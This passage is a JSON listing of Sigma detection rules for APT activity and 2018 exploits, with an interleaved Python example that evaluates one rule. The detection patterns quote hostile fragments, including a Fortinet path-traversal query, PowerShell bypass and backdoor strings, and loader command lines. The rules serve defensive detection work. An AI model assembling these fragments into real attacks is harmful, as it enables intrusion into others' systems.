    "path": "rules-emerging-threats/2017/TA/Pandemic/registry_event_apt_pandemic.yml",
    "content": "title: Pandemic Registry Key\nid: 47e0852a-cf81-4494-a8e6-31864f8c86ed\nstatus: test\ndescription: Detects Pandemic Windows Implant\nreferences:\n    - https://wikileaks.org/vault7/#Pandemic\n    - https://twitter.com/MalwareJake/status/870349480356454401\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-06-01\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1105\n    - detection.emerging-threats\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\services\\null\\Instance'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Turla/pipe_created_apt_turla_named_pipes.yml",
    "content": "title: Turla Group Named Pipes\nid: 739915e4-1e70-4778-8b8a-17db02f66db1\nstatus: test\ndescription: Detects a named pipe used by Turla group samples\nreferences:\n    - Internal Research\nauthor: Markus Neis\ndate: 2017-11-06\nmodified: 2021-11-27\ntags:\n    - attack.g0010\n    - attack.execution\n    - attack.t1106\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName:\n            - '\\atctl'    # https://www.virustotal.com/#/file/a4ddb2664a6c87a1d3c5da5a5a32a5df9a0b0c8f2e951811bd1ec1d44d42ccf1/detection\n            - '\\comnap'   # https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\n            - '\\iehelper' # ruag apt case\n            - '\\sdlrpc'   # project cobra https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\n            - '\\userpipe' # ruag apt case\n            # - '\\rpc' # may cause too many false positives : http://kb.palisade.com/index.php?pg=kb.page&id=483\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml",
    "content": "title: Turla Service Install\nid: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4\nstatus: test\ndescription: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET\nreferences:\n    - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-31\nmodified: 2021-11-30\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.g0010\n    - attack.t1543.003\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName:\n            - 'srservice'\n            - 'ipvpn'\n            - 'hkmsvc'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml",
    "content": "title: Turla PNG Dropper Service\nid: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1\nstatus: test\ndescription: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018\nreferences:\n    - https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-11-23\nmodified: 2021-11-30\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.g0010\n    - attack.t1543.003\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName: 'WerFaultSvc'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/Exploits/CVE-2018-13379/web_cve_2018_13379_fortinet_preauth_read_exploit.yml",
    "content": "title: Fortinet CVE-2018-13379 Exploitation\nid: a2e97350-4285-43f2-a63f-d0daff291738\nstatus: test\ndescription: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs\nreferences:\n    - https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/\nauthor: Bhabesh Raj\ndate: 2020-12-08\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2018-13379\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains|all:\n            - 'lang=/../../'\n            - '/dev/cmdb/sslvpn_websession'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/Exploits/CVE-2018-15473/lnx_sshd_exploit_cve_2018_15473.yml",
    "content": "title: SSHD Error Message CVE-2018-15473\nid: 4c9d903d-4939-4094-ade0-3cb748f4d7da\nstatus: test\ndescription: Detects exploitation attempt using public exploit code for CVE-2018-15473\nreferences:\n    - https://github.com/Rhynorater/CVE-2018-15473-Exploit\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-08-24\nmodified: 2021-11-27\ntags:\n    - attack.reconnaissance\n    - attack.t1589\n    - cve.2018-15473\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    service: sshd\ndetection:\n    keywords:\n        - 'error: buffer_get_ret: trying to get more bytes 1907 than in buffer 308 [preauth]'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2018/Exploits/CVE-2018-2894/web_cve_2018_2894_weblogic_exploit.yml",
    "content": "title: Oracle WebLogic Exploit\nid: 37e8369b-43bb-4bf8-83b6-6dd43bda2000\nstatus: test\ndescription: Detects access to a webshell dropped into a keystore folder on the WebLogic server\nreferences:\n    - https://twitter.com/pyn3rd/status/1020620932967223296\n    - https://github.com/LandGrey/CVE-2018-2894\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-07-22\nmodified: 2023-01-02\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1505.003\n    - cve.2018-2894\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query: '*/config/keystore/*.js*'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml",
    "content": "title: Elise Backdoor Activity\nid: e507feb7-5f73-4ef6-a970-91bb6f6d744f\nstatus: test\ndescription: Detects Elise backdoor activity used by APT32\nreferences:\n    - https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting\n    - https://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2018-01-31\nmodified: 2023-03-09\ntags:\n    - attack.g0030\n    - attack.g0050\n    - attack.s0081\n    - attack.execution\n    - attack.t1059.003\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_other_svchost:\n        Image|endswith: '\\Microsoft\\Network\\svchost.exe'\n    selection_other_del:\n        CommandLine|contains|all:\n            - '\\Windows\\Caches\\NavShExt.dll'\n            - '/c del'\n    selection_dll_path:\n        CommandLine|endswith:\n            - '\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll'\n            - '\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll'\n    selection_dll_function:\n        CommandLine|contains: ',Setting'\n    condition: 1 of selection_other_* or all of selection_dll_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml",
    "content": "title: APT27 - Emissary Panda Activity\nid: 9aa01d62-7667-4d3b-acb8-8cb5103e2014\nstatus: test\ndescription: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27\nreferences:\n    - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965\n    - https://twitter.com/cyb3rops/status/1168863899531132929\n    - https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-09-03\nmodified: 2023-03-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\n    - attack.g0027\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sllauncher:\n        ParentImage|endswith: '\\sllauncher.exe'\n        Image|endswith: '\\svchost.exe'\n    selection_svchost:\n        ParentImage|contains: '\\AppData\\Roaming\\'\n        Image|endswith: '\\svchost.exe'\n        CommandLine|contains: '-k'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml",
    "content": "title: Sofacy Trojan Loader Activity\nid: ba778144-5e3d-40cf-8af9-e28fb1df1e20\nstatus: test\ndescription: Detects Trojan loader activity as used by APT28\nreferences:\n    - https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/\n    - https://www.hybrid-analysis.com/sample/ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8?environmentId=110\n    - https://twitter.com/ClearskySec/status/960924755355369472\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community\ndate: 2018-03-01\nmodified: 2023-05-31\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.g0007\n    - attack.t1059.003\n    - attack.t1218.011\n    - car.2013-10-002\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_path:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            - '%LOCALAPPDATA%'\n            - '\\AppData\\Local\\'\n    selection_extensions:\n        - CommandLine|contains: '.dat\",'\n        - CommandLine|endswith:\n              - '.dll #1'\n              - '.dll\" #1'\n              - '.dll\",#1'\n    filter_main_exclude_temp:\n        CommandLine|contains: '\\AppData\\Local\\Temp\\'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
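The Sofacy rule above leans on three pieces of Sigma semantics that are easy to misread: fields inside one selection map are ANDed, a list of values under one field is ORed, and a selection written as a list of maps (as `selection_extensions` is) ORs the maps. The condition `all of selection_* and not 1 of filter_main_*` then requires every selection to hit and no filter to hit. The following Python is an added example, not part of the Sigma project or the rule: it transcribes that detection block into data, evaluates it with a small hand-written matcher, and runs it over constructed process-creation events (the event field values are invented for illustration). In production you would compile the rule with pySigma or sigma-cli for your backend; this block only makes the matching rules explicit.

```python
# Sofacy rule's detection block, transcribed as Python data (values as in the rule).
SOFACY_DETECTION = {
    "selection_path": {
        "Image|endswith": "\\rundll32.exe",
        "CommandLine|contains": ["%LOCALAPPDATA%", "\\AppData\\Local\\"],
    },
    # A list of maps: either map may match.
    "selection_extensions": [
        {"CommandLine|contains": '.dat",'},
        {"CommandLine|endswith": [".dll #1", '.dll" #1', '.dll",#1']},
    ],
    "filter_main_exclude_temp": {"CommandLine|contains": "\\AppData\\Local\\Temp\\"},
}


def _value_matches(modifier, field_value, pattern):
    # Sigma string comparisons are case-insensitive by default.
    fv, p = field_value.lower(), pattern.lower()
    if modifier == "contains":
        return p in fv
    if modifier == "endswith":
        return fv.endswith(p)
    if modifier == "startswith":
        return fv.startswith(p)
    if modifier is None:
        return fv == p
    raise ValueError(f"unsupported modifier: {modifier}")


def _map_matches(selection_map, event):
    # Every key of a map must match (AND); the values listed under one key are ORed,
    # unless the key carries the |all modifier, in which case every value must match.
    for key, patterns in selection_map.items():
        field, *modifiers = key.split("|")
        combine = all if "all" in modifiers else any
        modifiers = [m for m in modifiers if m != "all"]
        modifier = modifiers[0] if modifiers else None
        value = event.get(field)
        if value is None:
            return False
        patterns = patterns if isinstance(patterns, list) else [patterns]
        if not combine(_value_matches(modifier, value, p) for p in patterns):
            return False
    return True


def selection_matches(selection, event):
    # A selection given as a list of maps matches if any one map matches.
    if isinstance(selection, list):
        return any(_map_matches(m, event) for m in selection)
    return _map_matches(selection, event)


def sofacy_matches(event):
    """condition: all of selection_* and not 1 of filter_main_*"""
    selections = [v for k, v in SOFACY_DETECTION.items() if k.startswith("selection_")]
    filters = [v for k, v in SOFACY_DETECTION.items() if k.startswith("filter_main_")]
    return all(selection_matches(s, event) for s in selections) and not any(
        selection_matches(f, event) for f in filters
    )


# Constructed process_creation events (not real telemetry).
SAMPLE_EVENTS = [
    # Loader pattern described by the rule: DLL under AppData\Local, ordinal #1 export.
    {"Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": 'rundll32.exe "C:\\Users\\bob\\AppData\\Local\\Microsoft\\Credentials\\sessionid.dll",#1'},
    # Same shape but staged from Temp: removed by filter_main_exclude_temp.
    {"Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": 'rundll32.exe "C:\\Users\\bob\\AppData\\Local\\Temp\\x.dll",#1'},
    # Ordinary rundll32 use from System32: selection_path does not match.
    {"Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
]


def evaluate(events):
    return [sofacy_matches(e) for e in events]


if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(hit, event["CommandLine"])
```

Only the first constructed event fires: the second is suppressed by the Temp filter even though both selections match, which is the behaviour a detection engineer should confirm before trusting a rule with `not 1 of filter_*` in its condition.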
  {
    "path": "rules-emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml",
    "content": "title: APT29 2018 Phishing Campaign File Indicators\nid: 3a3f81ca-652c-482b-adeb-b1c804727f74\nrelated:\n    - id: 7453575c-a747-40b9-839b-125a0aae324b # ProcessCreation\n      type: derived\nstatus: stable\ndescription: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant\nreferences:\n    - https://twitter.com/DrunkBinary/status/1063075530180886529\n    - https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign\nauthor: '@41thexplorer'\ndate: 2018-11-20\nmodified: 2023-02-20\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - 'ds7002.lnk'\n            - 'ds7002.pdf'\n            - 'ds7002.zip'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml",
    "content": "title: APT29 2018 Phishing Campaign CommandLine Indicators\nid: 7453575c-a747-40b9-839b-125a0aae324b\nrelated:\n    - id: 033fe7d6-66d1-4240-ac6b-28908009c71f\n      type: obsolete\nstatus: stable\ndescription: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant\nreferences:\n    - https://twitter.com/DrunkBinary/status/1063075530180886529\n    - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/\n    - https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign\nauthor: Florian Roth (Nextron Systems), @41thexplorer\ndate: 2018-11-20\nmodified: 2023-03-08\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains: '-noni -ep bypass $'\n        - CommandLine|contains|all:\n              - 'cyzfc.dat,'\n              - 'PointFunctionCall'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/APT32-Oceanlotus/registry_event_apt_oceanlotus_registry.yml",
    "content": "title: OceanLotus Registry Activity\nid: 4ac5fc44-a601-4c06-955b-309df8c4e9d4\nstatus: test\ndescription: Detects registry keys created in OceanLotus (also known as APT32) attacks\nreferences:\n    - https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/\n    - https://github.com/eset/malware-ioc/tree/master/oceanlotus\nauthor: megan201296, Jonhnathan Ribeiro\ndate: 2019-04-14\nmodified: 2023-09-28\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - detection.emerging-threats\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection_clsid:\n        TargetObject|contains: '\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model'\n    selection_hkcu:\n        TargetObject|contains:\n            # HKCU\\SOFTWARE\\Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\n            - 'Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\'\n            # HKCU\\SOFTWARE\\Classes\\AppX3bbba44c6cae4d9695755183472171e2\\\n            - 'Classes\\AppX3bbba44c6cae4d9695755183472171e2\\'\n            # HKCU\\SOFTWARE\\Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\n            - 'Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\'\n            - 'Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model'\n    selection_appx_1:\n        TargetObject|contains: '\\SOFTWARE\\App\\'\n    selection_appx_2:\n        TargetObject|contains:\n            - 'AppXbf13d4ea2945444d8b13e2121cb6b663\\'\n            - 'AppX70162486c7554f7f80f481985d67586d\\'\n            - 'AppX37cc7fdccd644b4f85f4b22d5a3f105a\\'\n        TargetObject|endswith:\n            - 'Application'\n            - 'DefaultIcon'\n    condition: selection_clsid or selection_hkcu or all of selection_appx_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml",
    "content": "title: Potential MuddyWater APT Activity\nid: 36222790-0d43-4fe8-86e4-674b27809543\nstatus: test\ndescription: Detects potential Muddywater APT activity\nreferences:\n    - https://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-10\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.g0069\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_mshta:\n        CommandLine|contains|all:\n            - 'vbscript:Close(Execute(\"CreateObject('\n            - 'powershell'\n            - '-w 1 -exec Bypass'\n            - '\\ProgramData\\'\n    selection_survey:\n        CommandLine|contains|all:\n            - 'Win32_OperatingSystem'\n            - 'Win32_NetworkAdapterConfiguration'\n            - 'root\\SecurityCenter2'\n            - '[System.Net.DNS]'\n    selection_pwsh_backdoor:\n        CommandLine|contains|all:\n            - '[Convert]::ToBase64String'\n            - '[System.Text.Encoding]::UTF8.GetString]'\n            - 'GetResponse().GetResponseStream()'\n            - '[System.Net.HttpWebRequest]::Create('\n            - '-bxor '\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml",
    "content": "title: OilRig APT Activity\nid: ce6e34ca-966d-41c9-8d93-5b06c8b97a06\nrelated:\n    - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System\n      type: similar\n    - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security\n      type: similar\n    - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry\n      type: similar\nstatus: test\ndescription: Detects OilRig activity as reported by Nyotron in their March 2018 report\nreferences:\n    - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf\nauthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2018-03-23\nmodified: 2023-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.g0049\n    - attack.t1053.005\n    - attack.s0111\n    - attack.t1543.003\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.command-and-control\n    - attack.t1071.004\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_schtasks:\n        CommandLine|contains|all:\n            - 'SC Scheduled Scan'\n            - '\\microsoft\\Taskbar\\autoit3.exe'\n    selection_temp:\n        Image|contains: '\\Windows\\Temp\\DB\\'\n        Image|endswith: '.exe'\n    selection_service:\n        Image: 'C:\\Windows\\system32\\Service.exe'\n        CommandLine|contains:\n            - 'i'\n            - 'u'\n    selection_autoit:\n        ParentImage|endswith: '\\local\\microsoft\\Taskbar\\autoit3.exe'\n        CommandLine|contains|all:\n            - 'nslookup.exe'\n            - '-q=TXT'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/OilRig/registry_event_apt_oilrig_mar18.yml",
    "content": "title: OilRig APT Registry Persistence\nid: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5\nrelated:\n    - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System\n      type: similar\n    - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security\n      type: similar\n    - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation\n      type: similar\nstatus: test\ndescription: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report\nreferences:\n    - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf\nauthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2018-03-23\nmodified: 2023-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.g0049\n    - attack.t1053.005\n    - attack.s0111\n    - attack.t1543.003\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.command-and-control\n    - attack.t1071.004\n    - detection.emerging-threats\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml",
    "content": "title: OilRig APT Schedule Task Persistence - Security\nid: c0580559-a6bd-4ef6-b9b7-83703d98b561\nrelated:\n    - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System\n      type: similar\n    - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry\n      type: similar\n    - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation\n      type: similar\nstatus: test\ndescription: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report\nreferences:\n    - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf\nauthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2018-03-23\nmodified: 2023-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.g0049\n    - attack.t1053.005\n    - attack.s0111\n    - attack.t1543.003\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.command-and-control\n    - attack.t1071.004\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_service:\n        EventID: 4698\n        TaskName:\n            - 'SC Scheduled Scan'\n            - 'UpdatMachine'\n    condition: selection_service\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml",
    "content": "title: OilRig APT Schedule Task Persistence - System\nid: 53ba33fd-3a50-4468-a5ef-c583635cfa92\nrelated:\n    - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security\n      type: similar\n    - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry\n      type: similar\n    - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation\n      type: similar\nstatus: test\ndescription: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report\nreferences:\n    - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf\nauthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2018-03-23\nmodified: 2023-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.g0049\n    - attack.t1053.005\n    - attack.s0111\n    - attack.t1543.003\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.command-and-control\n    - attack.t1071.004\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName:\n            - 'SC Scheduled Scan'\n            - 'UpdatMachine'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml",
    "content": "title: Defrag Deactivation\nid: 958d81aa-8566-4cea-a565-59ccd4df27b0\nstatus: test\ndescription: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group\nreferences:\n    - https://securelist.com/apt-slingshot/84312/\nauthor: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)\ndate: 2019-03-04\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.s0111\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains:\n            - '/delete'\n            - '/change'\n        CommandLine|contains|all:\n            - '/TN'\n            - '\\Microsoft\\Windows\\Defrag\\ScheduledDefrag'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml",
    "content": "title: Defrag Deactivation - Security\nid: c5a178bf-9cfb-4340-b584-e4df39b6a3e7\nrelated:\n    - id: 958d81aa-8566-4cea-a565-59ccd4df27b0\n      type: derived\nstatus: test\ndescription: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group\nreferences:\n    - https://securelist.com/apt-slingshot/84312/\nauthor: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)\ndate: 2019-03-04\nmodified: 2022-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053\n    - attack.s0111\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Audit Other Object Access Events > Success'\ndetection:\n    selection:\n        EventID: 4701\n        TaskName: '\\Microsoft\\Windows\\Defrag\\ScheduledDefrag'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml",
    "content": "title: TropicTrooper Campaign November 2018\nid: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79\nstatus: stable\ndescription: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/\nauthor: '@41thexplorer, Microsoft Defender ATP'\ndate: 2019-11-12\nmodified: 2020-08-27\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc'\n    condition: selection\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml",
